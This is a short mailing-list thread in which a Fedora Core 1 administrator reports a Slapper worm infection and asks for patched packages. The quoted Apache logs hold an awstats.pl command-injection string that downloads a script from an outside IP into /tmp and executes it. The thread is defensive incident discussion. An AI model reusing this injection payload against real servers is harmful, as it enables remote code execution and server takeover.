slapper worm

[Michael Mansour]

Hi James,

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Michael Mansour wrote:
> > Hi guys,
> > 
> > I have an FC1 machine which got infected twice with the slapper worm, and then
> > started DOS attacking a large vendor.
> > 
> > I've stopped slapper in its tracks with a couple of changes to FC1, but in
> > analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache
> > SSL server which I've now turned off), I see the following bit of interest in
> > my apache access_log:
> > 
> > 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
> > /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> >
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> >  HTTP/1.1"
> >  403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> > 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
> > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> >
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> >  HTTP/1.1"
> >  404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> > 
> > These "scripz" files end up going into /tmp, being compiled with gcc, renamed
> > to "httpd" and run as that.
> > 
> > I'm using:
> > 
> > perl-5.8.3-17.4.legacy
> > httpd-2.0.51-1.9.legacy
> > openssl-0.9.7a-33.13.legacy
> > 
> > Are there any updates FL can do to any of the packages to fix/block slapper
> > from an FC1 machine?
> > 
> > Michael.
> >
> 
> Michael,
> 
> Try my version of httpd here:
> http://support.intcomgrp.com/~jkosin
> 
> It has been effective against the worm so far.

Thanks, I will actually try them out today.

Have you considered making a yum/apt repo for your packages? it'll make it
much easier to yum to newer releases when you have them, and it's quite easy
to make a yum/apt repo.

Michael.